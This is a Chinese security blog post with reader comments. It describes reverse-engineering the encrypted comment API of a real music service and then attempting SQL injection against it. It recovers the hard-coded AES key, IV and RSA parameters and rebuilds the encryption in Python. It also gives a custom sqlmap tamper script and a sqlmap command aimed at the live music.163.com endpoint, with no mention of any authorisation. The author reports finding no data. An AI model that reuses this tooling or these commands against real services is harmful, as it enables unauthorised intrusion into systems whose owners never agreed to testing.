某音乐

某音乐
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
某音乐类App评论相关API的分析及SQL注入尝试 molibird2017-12-08现金奖励共457945人围观，发现 16 个不明物体 WEB安全漏洞
*本文作者：molibird，本文属 FreeBuf 原创奖励计划，未经许可禁止转载。

关键字：APIfen、工具使用、sql注入

涉及工具/包：Fiddler、Burpsuite、Js2Py、Closure Compiler、selenium、phantomjs、sqlmap

摘要：
记录分析某音乐类App评论相关API的过程，以及一些工具/包的基本使用（部分工具对最后尝试没有影响，但在其它场景或许有用），最后结合sqlmap进行注入尝试。本文对于sql注入没有深入展开（水平不够…）。

想法来源：本想写个程序获取零评论的歌曲，去占沙发…分析发现获取评论的POST请求参数有点复杂…既然花时间研究了，顺便进行一下sql注入的尝试。

目录：
一、获取相关代码

1、获取评论的HTTP请求

2、寻找主要JS文件

3、Fiddler：将JS文件替换成本地JS文件便于调试

4、Fiddler + Burpsuite

5、具体发送请求的JS代码 / 构造参数的代码

二、分析代码：

1、windows.asrsea()函数

2、JSON.stringify(j7c)

3、最关键的加密函数b()

三、用Python完成JS加密函数的功能

1、Js2Py包：直接将JS转换成Python（失败尝试）

2、Closure Compiler：JS简化压缩（失败尝试）

3、selenium + phantomjs

四、sqlmap使用自定义tamper

1、编写tamper

2、sqlmap尝试

五、总结

正文
一、获取相关代码
1、获取评论的HTTP请求
1240 (2).jpg

评论的分页功能一般会用到的参数：第几页、获取几条等等。

但此处POST请求参数并不简单，直接加密成了一长串字符串。

params:qiilau38siKpZWyjPLd0mz5vmvwuJOPsH4r8CItto4llNtwkngH9RZHNIU05KkQS6cT070G78km+lAAUwZtzmxy4HAKeIxLdIGAt1JEfnIzG3S4N+d+D43aj0Bn82ft3TDhuc+KO0LoRQDmNah1mVNfBa+53wCp17otUTJL5cM3A2OVnG7Zj/F5pLOgwrWuP
encSecKey:b24e6b596cf6c50c314f480c3d1e34467e1597507d66a5cf9e338cfc5b059a25b82e0a80b78d30893b6605639f42e0842a68032ebc395168c91ddce14c9c9ff5b6fc60b38d479b19cf9b6f8c54c7be27aeebf6c0fc4a32dccb06f5e835f22581045288dec40d9c882e0a6b127958a546b35aacc0500324888d5bb75eec264430
2、寻找主要JS文件
1240 (1).jpg

这里的JS文件都是被混淆过的，但如果最后要构造/发送参数，参数名是不能被混淆的。因此，利用参数名encSecKey在JS内容中进行搜索，发现core.js中出现了3次，初步猜测相关的代码都在这里。

3、Fiddler：将JS文件替换成本地JS文件便于调试
1240.jpg

4、Fiddler + Burpsuite对Fiddler 还不熟悉，在这里仅利用fiddler的替换功能，其它查看分析都在Burp中完成。
Fiddler 好像没有Burp的截断暂停/方形功能？

Burpsuite好像没有Fiddler 那么方便的替换文件功能？

只需要将Fiddler设置代理将流量导向Burp的8080即可。

选择 Tools-Options 打开设置

1240 (6).jpg

5、具体发送请求的JS代码 / 构造参数的代码
搜索参数名encSecKey

var bLN7G = window.asrsea(JSON.stringify(j7c), bdH6B(["流泪", "强"]), bdH6B(Rq1x.md), bdH6B(["爱心", "女孩", "惊恐", "大笑"]));
e7d.data = k7d.de9V({params: bLN7G.encText, encSecKey: bLN7G.encSecKey})
console.log(bLN7G.encText); //添加代码
console.log(bLN7G.encSecKey) //添加代码
进行调试发现：

bLN7G对象、相关的 window.asrsea()成为关键

bLN7G.encText对应params
bLN7G.encSecKey对应encSecKey

1240 (5).jpg

浏览器工具输出内容与Burp内容不完全一样，因为burp内容经过了URL编码

二、分析代码：
1、windows.asrsea() 函数
function a(a) {
var d, e, b = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", c = "";
for (d = 0; a > d; d += 1) e = Math.random() * b.length, e = Math.floor(e), c += b.charAt(e);
return c
}

function b(a, b) {
var c = CryptoJS.enc.Utf8.parse(b), d = CryptoJS.enc.Utf8.parse("0102030405060708"),
e = CryptoJS.enc.Utf8.parse(a), f = CryptoJS.AES.encrypt(e, c, {iv: d, mode: CryptoJS.mode.CBC});
return f.toString()
}

function c(a, b, c) {
var d, e;
return setMaxDigits(131), d = new RSAKeyPair(b, "", c), e = encryptedString(d, a)
}

function d(d, e, f, g) {
var h = {}, i = a(16);
return h.encText = b(d, g), h.encText = b(h.encText, i), h.encSecKey = c(i, e, f), h
}

window.asrsea = d;

var bLN7G = window.asrsea(JSON.stringify(j7c), bdH6B(["流泪", "强"]), bdH6B(Rq1x.md), bdH6B(["爱心", "女孩", "惊恐", "大笑"]));
函数a()：
返回一个固定长度的随机字符串，后续的a(16)可以直接取16个a，”aaaaaaaaaaaaaaaa”。

函数window.asrsea()即函数d()
其中的c()函数传入的3个参数都是常数，猜测h.encSecKey就是一个常数，用抓到的请求包中的参数值直接代替，发现页面成功响应说明猜测正确。

i = a(16); //常数 "aaaaaaaaaaaaaaaa"

//e=bdH6B(["流泪", "强"]) 猜测为常数
console.log(bdH6B(["流泪", "强"]); //确认为常数 010001

//f=bdH6B(Rq1x.md) 猜测为常数
console.log(Rq1x.md); //确认为常数 "00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7"

h.encSecKey = c(i, e, f) //可替换成常数： "d473b9eca232f1b4090dd606b0df86de318748dd2eec307e4ed4345030fc4ee30331e598f41d5a6f5befaab94630ea1a1eda7cfade84fbec1a907913d2e4d2c8744bc572b99a050075e075b4537f645ecfa994f95906c32818e076aeda6bdb906bfa0bb96c4cf4bc3ed6d9ab76cf08441153d9d85e1ea3d78fa8d9210d581cee"
根据分析，对代码进行整理：

function b(parm1, parm2) {
var f = CryptoJS.AES.encrypt(
CryptoJS.enc.Utf8.parse(parm1),
CryptoJS.enc.Utf8.parse(parm2),
{
iv: CryptoJS.enc.Utf8.parse("0102030405060708"),
mode: CryptoJS.mode.CBC
}
);
return f.toString()
}

window.asrsea = function (parm1, parm2, parm3, parm4) {
var h = {};
h.encText = b(b(parm1, "0CoJUm6Qyw8W8jud"), "aaaaaaaaaaaaaaaa");
h.encSecKey = "d473b9eca232f1b4090dd606b0df86de318748dd2eec307e4ed4345030fc4ee30331e598f41d5a6f5befaab94630ea1a1eda7cfade84fbec1a907913d2e4d2c8744bc572b99a050075e075b4537f645ecfa994f95906c32818e076aeda6bdb906bfa0bb96c4cf4bc3ed6d9ab76cf08441153d9d85e1ea3d78fa8d9210d581cee";
return h;
};

var bLN7G = window.asrsea(JSON.stringify(j7c), bdH6B(["流泪", "强"]), bdH6B(Rq1x.md), bdH6B(["爱心", "女孩", "惊恐", "大笑"]));
到目前为止，window.asrsea()的有效参数只剩下第一个JSON.stringify(j7c)

2、JSON.stringify(j7c)
console.log(JSON.stringify(j7c))
1240 (7).jpg
和评论API相关的就是

{"rid":"R_SO_4_28285910","offset":"0","total":"true","limit":"20","csrf_token":""}
在代码中直接修改 offset：

到这里就和平时进行sql注入的情形很像了。

3、最关键的加密函数b()
function b(parm1, parm2) {
var f = CryptoJS.AES.encrypt(
CryptoJS.enc.Utf8.parse(parm1),
CryptoJS.enc.Utf8.parse(parm2),
{
iv: CryptoJS.enc.Utf8.parse("0102030405060708"),
mode: CryptoJS.mode.CBC
}
);
return f.toString()
}
发现CryptoJS对象的内容绕来绕去…代码量太多(这里就不贴出来了,太占篇幅)

想要寻找简单点的办法

三、用Python完成JS加密函数的功能
1、Js2Py包：直接将JS转换成Python（失败尝试）基本使用：
import js2py
js2py.translate_file('input.js', 'output.py') #将input.js的代码转换成output.py
from output import output
output.fun() # 等同于调用js中的函数 fun()
注意：Js2Py无法识别JS用法：

可修改为
```var fun_a = function(){}; fun_a();
使用发生错误，还有很多JS的用法Js2Py不能识别。

想先将JS进行简化，再进行转换尝试。

2、Closure Compiler：JS简化压缩（失败尝试）
java -jar compiler.jar --compilation_level ADVANCED_OPTIMIZATIONS --js old.js > new.js
--compilation_level ADVANCED_OPTIMIZATIONS

智能模式如下 JS代码：

function a(){
console.log('1');
}
a();
压缩后：自动删除所有无用的代码

console.log('1');
注意：Compiler无法识别JS非严格模式的用法
解决办法：
1、arguments.callee被弃用：给函数增加一个函数名
2、delete parm修改为parm = null

简化压缩后，再次尝试Js2Py的转换，依然失败…

被混淆的JS代码，暂时没能力去修改到复核Js2Py的格式。

只能换个思路：Python调用浏览器，让浏览器去执行JS

PyV8，没安装成功…

3、selenium + phantomjs
selenium 结合浏览器（比如Firefox需要下载 geckodriver）

selenium 结合 phantomjs（类似：不显示内容的浏览器）速度更快

第一步、下载phantomjs、geckodriver并将路径添加到系统的PATH环境变量

第二步、本地服务器创建php文件，利用原有的JS进行加密然后输出：

第三步、selenium结合phantomjs：

from selenium import webdriver

# browser = webdriver.Firefox() # 调用Firefox
browser = webdriver.PhantomJS()

# payload是windows.asrsea()进行加密的第一个参数，
payload = "{\"rid\":\"R_SO_4_28285910\",\"offset\":\"0\",\"total\":\"true\",\"limit\":\"1 AND 9893=7923\",\"csrf_token\":\"\"}"

browser.get('http://127.0.0.1/wyy.php?payload='+payload)

output = browser.find_element_by_id("output")

//获取编码后的 params 参数值
print output.text

browser.quit()
四、sqlmap使用自定义tamper
1、编写tamper
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
from selenium import webdriver

__priority__ = PRIORITY.LOWEST

def dependencies():
pass

def tamper(payload, **kwargs):
browser = webdriver.PhantomJS()

# 对offset参数进行测试
payload = '{"rid":"R_SO_4_28285910","offset":"'+payload+'","total":"true","limit":"20","csrf_token":""}'

# 对limit参数进行测试
# payload = '{"rid":"R_SO_4_28285910","offset":"0","total":"true","limit":"'+payload+'","csrf_token":""}'

browser.get('http://127.0.0.1/wyy.php?payload='+payload)
output = browser.find_element_by_id("output")
browser.quit()
return output.text
2、sqlmap尝试
python sqlmap.py -vvvvvvv -u "music.163.com/weapi/v1/resource/comments/R_SO_4_28285910?csrf_token=" --data="params=...*&encSecKey=..." --param-del="&" --cookie="..." --user-agent="Mozilla/5.0" --method=POST -p "params" --tamper="my_test"
五、总结：
使用selenium效率肯定没有直接Python直接加密好，但对于混淆过的JS代码，可以省去很大的分析精力…对于类似存在加密的场景，也可以快速进行尝试。

对于应用开发来说，即使在前端对参数值进行加密，后端在使用中依然需要进行过滤。

参考：
1、https://www.zhihu.com/question/36081767
2、https://developers.google.com/closure/compiler/docs/gettingstarted_app
3、https://github.com/PiotrDabkowski/Js2Py
4、https://pypi.python.org/pypi/selenium/3.8.0
5、https://github.com/mozilla/geckodriver
6、http://phantomjs.org/

*本文作者：molibird，本文属 FreeBuf 原创奖励计划，未经许可禁止转载。

molibird
molibird
2 篇文章
等级： 2级
||
上一篇：关于Web应用和容器的指纹收集以及自动化软件的制作下一篇：PHP WebShell变形技术总结
这些评论亮了

网易云音乐回复
我做错了什么
)27(亮了

赛艇队长回复
别某了，网易云音乐，加密方法去年晚上就有了
)15(亮了
发表评论已有 16 条评论

赛艇队长 2017-12-08回复 1楼
别某了，网易云音乐，加密方法去年晚上就有了

亮了(15)

molibird (2级) 2017-12-08回复
@ 赛艇队长嗯，写的时候也看了好多分析，有些已经是其它语言写的了。加密算法我并看不懂…主要是想记录过程和工具，感觉可以在某些场景下可以用到…具体项目上是如何测试的并不了解。还在闭门学习中，很没方向…如果可以的话，但愿可以指导交流下~感谢~~

亮了(1)

Freedom (3级) 2017-12-08回复 2楼
网易云吧，出数据了么

亮了(0)

Laopieing (2级) 2017-12-08回复 3楼
好想知道我邮箱号密码是多少

亮了(1)

LSA (4级) 2017-12-08回复 4楼
方形功能？

亮了(2)

fdgsdfg 2017-12-08回复 5楼
网易公关干死你。

亮了(2)

molibird (2级) 2017-12-08回复
@ fdgsdfg 额…这是我的锅…以后会注意…但愿这次放过我…

亮了(1)

Unknow Username 2017-12-08回复 6楼
music.163.com……暴露了……

亮了(1)

111 2017-12-08回复 7楼
裤子+1?

亮了(1)

网易云音乐 2017-12-08回复 8楼
我做错了什么

亮了(27)

leveluo (3级) 2017-12-08回复 9楼

亮了(1)

filefox 2017-12-08回复 10楼
裤子？

亮了(0)

molibird (2级) 2017-12-08回复 11楼
统一回复下：

1、**没有数据！没有数据！** 目的是记录过程和介绍工具。标题原本就是"…失败尝试"，最后sqlmap是为了验证tamper。

2、打码意识欠缺，错误很严重…以后一定注意…但愿还有以后…

3、希望解决：API加密情况下，如何处理后再利用sqlmap等自动化工具。

4、介绍的方式比较简单，有好的方法希望能够交流下~~感谢~~

亮了(4)

1 2017-12-10回复 12楼
github上出现网易的域名代码他们法务分分钟发律师函…

亮了(3)

、俗咖 (1级) 2017-12-13回复 13楼
:grin: :grin: :grin:

亮了(1)

china Python 2018-01-10回复 14楼
这标题读了半天没读明白！！！！

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
molibird
molibird

这家伙太懒，还未填写个人描述！

2
文章数
3
评论数
最近文章
OPNsense防火墙搭建实验环境，MSF与SSH进行流量转发
2017.12.19

某音乐类App评论相关API的分析及SQL注入尝试
2017.12.08

浏览更多
相关阅读
Burp Suite—BLIND SQL INJECTIONburpsuite_pro_v1.5.11 破解版如何利用SQL注入制造一个后门Informix数据库SQL注入实战售价500美元的喀秋莎SQL扫描器好在哪里？
特别推荐

关注我们分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

文章评论